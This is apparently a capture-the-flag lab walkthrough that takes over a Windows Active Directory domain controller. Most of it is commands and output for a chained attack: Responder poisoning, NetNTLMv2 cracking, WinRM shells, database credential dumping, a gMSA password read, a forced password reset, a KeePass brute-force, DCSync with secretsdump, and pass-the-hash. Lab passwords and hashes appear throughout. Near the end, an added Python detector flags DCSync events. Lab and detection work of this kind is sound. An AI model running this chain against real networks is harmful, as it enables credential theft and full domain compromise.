┌──(root㉿kali)-[/home/kali/thl/curiosity2]
└─# fscan -h 192.168.56.116
fscan version: 1.8.4
start infoscan
192.168.56.116:135 open
192.168.56.116:139 open
192.168.56.116:445 open
192.168.56.116:88 open
[*] alive ports len is: 4
start vulscan
[*] NetBios 192.168.56.116 [+] DC:CONS\WIN-C73PROQLRHL
[*] NetInfo
[*]192.168.56.116
[->]WIN-C73PROQLRHL
[->]192.168.56.116
[->]10.16.41.51
[->]2409:8760:1e81:10::39d9
已完成 4/4
[*] 扫描结束,耗时: 2.092922428s
┌──(root㉿kali)-[/home/kali/thl/curiosity2]
└─# nmap -sCV 192.168.56.116
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-10 17:57 CST
Nmap scan report for 192.168.56.116
Host is up (0.00029s latency).
Not shown: 990 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-12-10 16:57:42Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cons.thl, Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=WIN-C73PROQLRHL.cons.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:WIN-C73PROQLRHL.cons.thl
| Not valid before: 2024-10-11T16:05:23
|_Not valid after: 2025-10-11T16:05:23
|_ssl-date: 2024-12-10T16:58:30+00:00; +6h59m59s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cons.thl, Site: Default-First-Site-Name)
|_ssl-date: 2024-12-10T16:58:30+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=WIN-C73PROQLRHL.cons.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:WIN-C73PROQLRHL.cons.thl
| Not valid before: 2024-10-11T16:05:23
|_Not valid after: 2025-10-11T16:05:23
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: cons.thl, Site: Default-First-Site-Name)
|_ssl-date: 2024-12-10T16:58:30+00:00; +6h59m59s from scanner time.
| ssl-cert: Subject: commonName=WIN-C73PROQLRHL.cons.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:WIN-C73PROQLRHL.cons.thl
| Not valid before: 2024-10-11T16:05:23
|_Not valid after: 2025-10-11T16:05:23
MAC Address: 08:00:27:C1:EE:2F (Oracle VirtualBox virtual NIC)
Service Info: Host: WIN-C73PROQLRHL; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_nbstat: NetBIOS name: WIN-C73PROQLRHL, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:c1:ee:2f (Oracle VirtualBox virtual NIC)
| smb2-time:
| date: 2024-12-10T16:58:21
|_ start_date: 2024-12-10T16:56:53
|_clock-skew: mean: 6h59m58s, deviation: 0s, median: 6h59m58s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 73.57 seconds
┌──(root㉿kali)-[/home/kali/thl/curiosity2]
└─# responder -I eth0
[SMB] NTLMv2-SSP Client : fe80::e880:b43a:2756:c900
[SMB] NTLMv2-SSP Username : cons\Appolonia
[SMB] NTLMv2-SSP Hash : Appolonia::cons:49ad08d5b95f487e:7981C671B6509FFED9036CB51727F74D:010100000000000080A60B552D4BDB01CEC743A0ED3C72F20000000002000800380035005200410001001E00570049004E002D0054004B005A00410054004A0045004C0049003200440004003400570049004E002D0054004B005A00410054004A0045004C004900320044002E0038003500520041002E004C004F00430041004C000300140038003500520041002E004C004F00430041004C000500140038003500520041002E004C004F00430041004C000700080080A60B552D4BDB0106000400020000000800300030000000000000000000000000400000F8AC0EC0C53E58EC88B9F6134D5F79AEA985E41E98EE06169DEB1E85F052D0610A0010000000000000000000000000000000000009001C0063006900660073002F00530051004C00730065007200760065007200000000000000000000000000
[*] [NBT-NS] Poisoned answer sent to 192.168.56.116 for name SQLDATABABASE (service: File Server)
[*] [LLMNR] Poisoned answer sent to fe80::e880:b43a:2756:c900 for name SQLDatababase
[*] [LLMNR] Poisoned answer sent to 192.168.56.116 for name SQLDatababase
[*] [LLMNR] Poisoned answer sent to fe80::e880:b43a:2756:c900 for name SQLDatababase
[*] [LLMNR] Poisoned answer sent to 192.168.56.116 for name SQLDatababase
[SMB] NTLMv2-SSP Client : fe80::e880:b43a:2756:c900
[SMB] NTLMv2-SSP Username : cons\sqldb
[SMB] NTLMv2-SSP Hash : sqldb::cons:d7ed9707c16853ff...
Going by this author's habits, rockyou usually does not crack these, so switch to a different wordlist.
┌──(root㉿kali)-[/home/kali/thl/curiosity2]
└─# hashcat -a 0 -m 5600 appolonia_ntlmv2.txt /usr/share/wordlists/seclists/Passwords/seasons.txt
APPOLONIA::cons:49ad08d5b95f487e:7981c671b6509ffed9036cb51727f74d:...:5umm3r@
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: APPOLONIA::cons:49ad08d5b95f487e:7981c671b6509ffed9...000000
Time.Started.....: Mon Dec 16 16:25:24 2024 (0 secs)
Time.Estimated...: Mon Dec 16 16:25:24 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/seclists/Passwords/seasons.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1764.7 kH/s (1.11ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4096/5390 (75.99%)
Rejected.........: 0/4096 (0.00%)
Restore.Point....: 0/5390 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $pr1ng -> W1NT3R2021@
Hardware.Mon.#1..: Util: 12%
Started: Mon Dec 16 16:25:23 2024
Stopped: Mon Dec 16 16:25:25 2024
SQLDB::cons:d7ed9707c16853ff:95d5f1d9d93d1c77a5c6b4e03b2bacdc:...:au7umn@
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SQLDB::cons:d7ed9707c16853ff:95d5f1d9d93d1c77a5c6b4...000000
Time.Started.....: Mon Dec 16 16:26:39 2024 (0 secs)
Time.Estimated...: Mon Dec 16 16:26:39 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/seclists/Passwords/seasons.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 1785.6 kH/s (1.52ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4096/5390 (75.99%)
Rejected.........: 0/4096 (0.00%)
Restore.Point....: 0/5390 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $pr1ng -> W1NT3R2021@
Hardware.Mon.#1..: Util: 12%
Started: Mon Dec 16 16:26:39 2024
Stopped: Mon Dec 16 16:26:41 2024
Two sets of credentials were recovered:
SQLDB : au7umn@
APPOLONIA : 5umm3r@
Testing shows both can log in.
┌──(root㉿kali)-[/home/kali/thl/curiosity2]
└─# evil-winrm -i 192.168.56.116 -u APPOLONIA -p '5umm3r@'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\appolonia\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
┌──(root㉿kali)-[/home/kali/thl/curiosity2]
└─# evil-winrm -i 192.168.56.116 -u SQLDB -p 'au7umn@'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\sqldb\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Gather database information
*Evil-WinRM* PS C:\Users\sqldb\Documents> reg query "HKLM\SOFTWARE\Microsoft\Microsoft SQL Server\Instance Names\SQL"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\Instance Names\SQL
SQLEXPRESS REG_SZ MSSQL15.SQLEXPRESS
The instance name is SQLEXPRESS, but the full name is WIN-C73PROQLRHL\SQLEXPRESS
*Evil-WinRM* PS C:\Users\sqldb\Documents> sqlcmd -E -S 'WIN-C73PROQLRHL\SQLEXPRESS' -Q 'select @@version;'
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64)
Sep 24 2019 13:48:23
Copyright (C) 2019 Microsoft Corporation
Express Edition (64-bit) on Windows Server 2016 Datacenter 10.0 <X64> (Build 14393: ) (Hypervisor)
(1 rows affected)
Query the database names
*Evil-WinRM* PS C:\Users\sqldb\Documents> sqlcmd -E -S 'WIN-C73PROQLRHL\SQLEXPRESS' -Q 'SELECT name FROM master.dbo.sysdatabases;'
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
CredentialsDB
toolsdb
(6 rows affected)
There is a CredentialsDB database; it may contain something usable, so take a look.
*Evil-WinRM* PS C:\Users\sqldb\Documents> sqlcmd -E -S 'WIN-C73PROQLRHL\SQLEXPRESS' -d CredentialsDB -Q "SELECT * FROM dbo.Credentials;"
ID Username Password
----------- -------------------------------------------------- ----------------------------------------------------------------------------------------------------
1 sqlsvc a6d888301de7aa3b380a691d32837627
(1 rows affected)
Crack this MD5 hash
a6d888301de7aa3b380a691d32837627:$PRING2021#
This gives the password of user sqlsvc: $PRING2021#
Collect domain information
┌──(root㉿kali)-[/home/kali/thl/curiosity2]
└─# netexec ldap 192.168.56.116 -u 'SQLDB' -p 'au7umn@' --bloodhound --collection All --dns-server 192.168.56.116
SMB 192.168.56.116 445 WIN-C73PROQLRHL [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-C73PROQLRHL) (domain:cons.thl) (signing:True) (SMBv1:False)
LDAP 192.168.56.116 389 WIN-C73PROQLRHL [+] cons.thl\SQLDB:au7umn@
LDAP 192.168.56.116 389 WIN-C73PROQLRHL Resolved collection methods: acl, group, localadmin, psremote, trusts, objectprops, session, rdp, dcom, container
LDAP 192.168.56.116 389 WIN-C73PROQLRHL Done in 00M 00S
LDAP 192.168.56.116 389 WIN-C73PROQLRHL Compressing output into /root/.nxc/logs/WIN-C73PROQLRHL_192.168.56.116_2024-12-16_165009_bloodhound.zip
Collection with netexec failed; something went wrong somewhere. Upload SharpHound.exe directly and collect on the host.
*Evil-WinRM* PS C:\Users\sqlsvc\Documents> upload /home/kali/thl/curiosity2/SharpHound.exe
Info: Uploading /home/kali/thl/curiosity2/SharpHound.exe to C:\Users\sqlsvc\Documents\SharpHound.exe
Data: 1395368 bytes of 1395368 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\sqlsvc\Documents> ls
Directory: C:\Users\sqlsvc\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 10/31/2024 6:23 PM 2231 Database.kdbx
-a---- 12/16/2024 4:55 PM 1046528 SharpHound.exe
*Evil-WinRM* PS C:\Users\sqlsvc\Documents> ./SharpHound.exe
2024-12-16T16:55:38.5773646+01:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-12-16T16:55:39.0929517+01:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-12-16T16:55:39.4209905+01:00|INFORMATION|Initializing SharpHound at 16:55 on 16/12/2024
2024-12-16T16:55:42.0303498+01:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for cons.thl : WIN-C73PROQLRHL.cons.thl
2024-12-16T16:55:42.1237157+01:00|INFORMATION|Flags: Group, LocalAdmin, Session, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-12-16T16:55:42.5300046+01:00|INFORMATION|Beginning LDAP search for cons.thl
2024-12-16T16:55:42.6708951+01:00|INFORMATION|Producer has finished, closing LDAP channel
2024-12-16T16:55:42.6868321+01:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-12-16T16:56:12.8426741+01:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM
2024-12-16T16:56:29.4678294+01:00|INFORMATION|Consumers finished, closing output channel
2024-12-16T16:56:29.5152889+01:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-12-16T16:56:29.8740248+01:00|INFORMATION|Status: 192 objects finished (+192 4.085106)/s -- Using 42 MB RAM
2024-12-16T16:56:29.8740248+01:00|INFORMATION|Enumeration finished in 00:00:47.3672286
2024-12-16T16:56:30.0931388+01:00|INFORMATION|Saving cache with stats: 152 ID to type mappings.
152 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-12-16T16:56:30.1869703+01:00|INFORMATION|SharpHound Enumeration Completed at 16:56 on 16/12/2024! Happy Graphing!
*Evil-WinRM* PS C:\Users\sqlsvc\Documents> ls
Directory: C:\Users\sqlsvc\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 12/16/2024 4:56 PM 16777 20241216165628_BloodHound.zip
-a---- 10/31/2024 6:23 PM 2231 Database.kdbx
-a---- 12/16/2024 4:56 PM 22359 NzAyMzNmYzYtYzFjNi00MDYxLTg5ZTYtY2FmOWMwODg1MzZm.bin
-a---- 12/16/2024 4:55 PM 1046528 SharpHound.exe
*Evil-WinRM* PS C:\Users\sqlsvc\Documents> download 20241216165628_BloodHound.zip
Info: Downloading C:\Users\sqlsvc\Documents\20241216165628_BloodHound.zip to 20241216165628_BloodHound.zip
Info: Download successful!
While collecting, we notice a Database.kdbx in the current folder and download it.
.kdbx is the encrypted database file format used by the KeePass password manager (KeePass 2.x and later).
Our current user SQLSVC belongs to the SVCACCOUNTS group, and that group can read the password of the GMSA_SQL$ machine account.
Retrieve the password
┌──(root㉿kali)-[/home/kali/thl/curiosity2]
└─# nxc ldap 192.168.56.116 -u 'sqlsvc' -p '$PRING2021#' --gmsa
SMB 192.168.56.116 445 WIN-C73PROQLRHL [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-C73PROQLRHL) (domain:cons.thl) (signing:True) (SMBv1:False)
LDAPS 192.168.56.116 636 WIN-C73PROQLRHL [+] cons.thl\sqlsvc:$PRING2021#
LDAPS 192.168.56.116 636 WIN-C73PROQLRHL [*] Getting GMSA Passwords
LDAPS 192.168.56.116 636 WIN-C73PROQLRHL Account: GMSA_SQL$ NTLM: 1ac0f76a248b111e724b9ca39da34988
Analysing that machine account's permissions shows it can change another user's password. Change the password:
┌──(root㉿kali)-[/home/kali/thl/curiosity2]
└─# impacket-changepasswd CONS.THL/toolsdb@cons.thl -newpass 'admin!@#45' -altuser "GMSA_SQL$" -althash ':1ac0f76a248b111e724b9ca39da34988' -no-pass -reset
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
[*] Setting the password of CONS.THL\toolsdb as CONS.THL\GMSA_SQL$
[*] Connecting to DCE/RPC as CONS.THL\GMSA_SQL$
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.
Going by the name, log in as the toolsdb user. The username alone suggests this user most likely has something in the database, and the earlier database listing showed a toolsdb database that our user at the time had no permission to query. Use this user to view the contents of the toolsdb database. List the table names:
*Evil-WinRM* PS C:\Users\toolsdb\Documents> sqlcmd -E -S "localhost\SQLEXPRESS" -d "toolsdb" -Q "SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_TYPE = 'BASE TABLE';"
TABLE_NAME
--------------------------------------------------------------------------------------------------------------------------------
users
(1 rows affected)
View the contents of the users table
*Evil-WinRM* PS C:\Users\toolsdb\Documents> sqlcmd -E -S 'WIN-C73PROQLRHL\SQLEXPRESS' -d toolsdb -Q "SELECT * FROM users;"
id username password
----------- -------------------------------------------------- --------------------------------------------------
1 user_6B482050 433129A1!@1
2 user_47F7501A 64409A1C!@1
3 user_515A0C58 CAD616E3!@1
4 user_CA843BF2 731C60AD!@1
5 user_AA2B9FF8 8E181E5F!@1
6 user_F6E6A108 47862562!@1
7 user_8D56BAE8 425B6335!@1
8 user_BA9B1295 E4FC1AC4!@1
9 user_66B7DBEE 4EE216A3!@1
10 user_E75B7C23 4CD89A92!@1
(10 rows affected)
Save these passwords to a file as a wordlist, then use rpcclient to list all users in the domain
┌──(root㉿kali)-[/home/kali/thl/curiosity2]
└─# rpcclient -U "Appolonia%5umm3r@" 192.168.56.116 -c 'enumdomusers'|cut -d '[' -f2|cut -d ']' -f1 >dbuser.txt
┌──(root㉿kali)-[/home/kali/thl/curiosity2]
└─# crackmapexec smb cons.thl -u dbuser.txt -p userdb_pass --continue-on-success
SMB cons.thl 445 WIN-C73PROQLRHL [*] Windows 10 / Server 2016 Build 14393 x64 (name:WIN-C73PROQLRHL) (domain:cons.thl) (signing:True) (SMBv1:False)
SMB cons.thl 445 WIN-C73PROQLRHL [-] cons.thl\Administrator:433129A1!@1 STATUS_LOGON_FAILURE
SMB cons.thl 445 WIN-C73PROQLRHL [-] cons.thl\Administrator:64409A1C!@1 STATUS_LOGON_FAILURE
SMB cons.thl 445 WIN-C73PROQLRHL [-] cons.thl\Administrator:CAD616E3!@1 STATUS_LOGON_FAILURE
SMB cons.thl 445 WIN-C73PROQLRHL [-] cons.thl\Administrator:731C60AD!@1 STATUS_LOGON_FAILURE
SMB cons.thl 445 WIN-C73PROQLRHL [-] cons.thl\Administrator:8E181E5F!@1 STATUS_LOGON_FAILURE
SMB cons.thl 445 WIN-C73PROQLRHL [-] cons.thl\Administrator:47862562!@1 STATUS_LOGON_FAILURE
SMB cons.thl 445 WIN-C73PROQLRHL [-] cons.thl\Administrator:425B6335!@1 STATUS_LOGON_FAILURE
SMB cons.thl 445 WIN-C73PROQLRHL [-] cons.thl\Administrator:E4FC1AC4!@1 STATUS_LOGON_FAILURE
SMB cons.thl 445 WIN-C73PROQLRHL [-] cons.thl\Administrator:4EE216A3!@1 STATUS_LOGON_FAILURE
SMB cons.thl 445 WIN-C73PROQLRHL [-] cons.thl\Administrator:4CD89A92!@1 STATUS_LOGON_FAILURE
SMB cons.thl 445 WIN-C73PROQLRHL [-] cons.thl\Guest:433129A1!@1 STATUS_LOGON_FAILURE
...
All of them failed. These passwords may not belong to those users; they may be the password of the kdbx database file we obtained earlier. Brute-force it with this tool:
https://github.com/r3nt0n/keepass4brute
The prerequisites need to be installed first:
add-apt-repository -y ppa:phoerious/keepassxc
apt update && sudo apt install keepassxc
Brute-force the password
┌──(root㉿kali)-[/home/kali/thl/curiosity2]
└─# ./keepass4brute.sh Database.kdbx userdb_pass
keepass4brute 1.3 by r3nt0n
https://github.com/r3nt0n/keepass4brute
[+] Words tested: 5/9 - Attempts per minute: 0 - Estimated time remaining: Calculating...
[+] Current attempt: 8E181E5F!@1
[*] Password found: 8E181E5F!@1
Successfully obtained the database password 8E181E5F!@1. Viewing the database file's contents, we find the password of the MSOL user: YRax2Ry8g2ITQ3hpRPze. Analysing the MSOL user shows it can perform a DCSync attack.
┌──(root㉿kali)-[/home/…/thl/curiosity2/impacket-master/impacket]
└─# impacket-secretsdump MSOL:'YRax2Ry8g2ITQ3hpRPze'@WIN-C73PROQLRHL.cons.thl
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5d48bcf84aea999fb1ade06970a81237:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a6c4014f622dcadd4ec24cec540aaa86:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
cons.thl\sqlsvc:1104:aad3b435b51404eeaad3b435b51404ee:17e75629f370f459434786808006cac1:::
cons.thl\jwats:1105:aad3b435b51404eeaad3b435b51404ee:197c3e98518a436666dbe95d78dc87a6:::
...
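As an added detection example (not part of the original writeup) for the DCSync step above: a DCSync is visible on the domain controller as Security event 4662 with the replication control-access rights in its Properties field, used by a principal that is not a DC. The check below runs over constructed sample events whose field names follow 4662; the function names, the DC list and the allowlist parameter are my own.

```python
# Control-access right GUIDs a replication partner needs (AD extended rights).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # AccessMask bit set when 4662 records an extended-right check

def replication_rights_used(properties: str) -> list:
    # Properties lists brace-wrapped GUIDs; return readable names of any replication rights.
    guids = {p.strip("{}").lower() for p in properties.split()}
    return sorted(REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS)

def dcsync_alerts(events, dc_hostnames, allowed_sync_accounts=()):
    # Flag replication-rights use by anyone other than a DC machine account or an
    # explicitly allowed sync account (an Entra Connect MSOL_* account legitimately replicates,
    # which is exactly why such accounts need to be inventoried rather than ignored).
    dcs = {h.upper() + "$" for h in dc_hostnames}
    allowed = {a.upper() for a in allowed_sync_accounts}
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662 or not ev.get("AccessMask", 0) & CONTROL_ACCESS:
            continue
        rights = replication_rights_used(ev.get("Properties", ""))
        if not rights:
            continue
        subject = ev["SubjectUserName"].upper()
        if subject in dcs or subject in allowed:
            continue
        alerts.append({"account": ev["SubjectUserName"], "domain": ev["SubjectDomainName"],
                       "rights": rights, "time": ev["TimeCreated"]})
    return alerts

# Constructed sample events (4662 field names; values invented for this demo, not from a real log).
# 19195a5b-... is the domainDNS object class GUID that appears alongside the right in a DCSync.
SAMPLE_EVENTS = [
    {"EventID": 4662, "TimeCreated": "2024-12-16T16:10:02Z", "SubjectUserName": "WIN-C73PROQLRHL$",
     "SubjectDomainName": "CONS", "AccessMask": 0x100,
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "TimeCreated": "2024-12-16T16:12:40Z", "SubjectUserName": "MSOL",
     "SubjectDomainName": "CONS", "AccessMask": 0x100,
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} "
                   "{19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "TimeCreated": "2024-12-16T16:13:01Z", "SubjectUserName": "sqlsvc",
     "SubjectDomainName": "CONS", "AccessMask": 0x10,  # ordinary read, placeholder property GUID
     "Properties": "{00000000-0000-0000-0000-000000000000}"},
]

if __name__ == "__main__":
    for a in dcsync_alerts(SAMPLE_EVENTS, dc_hostnames=["WIN-C73PROQLRHL"]):
        print(f"[ALERT] {a['domain']}\\{a['account']} used {', '.join(a['rights'])} at {a['time']}")
```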
Pass the hash to get the flags
┌──(root㉿kali)-[/home/kali/thl/curiosity2]
└─# evil-winrm -i 192.168.56.116 -u Administrator -H '5d48bcf84aea999fb1ade06970a81237'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cons\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> type root.flag.txt
372a1c39714b6bbcec0f85de5c6c2599
*Evil-WinRM* PS C:\Users\appolonia\documents> type user.flag.txt
de4769769d10f96ae069e9926a10454e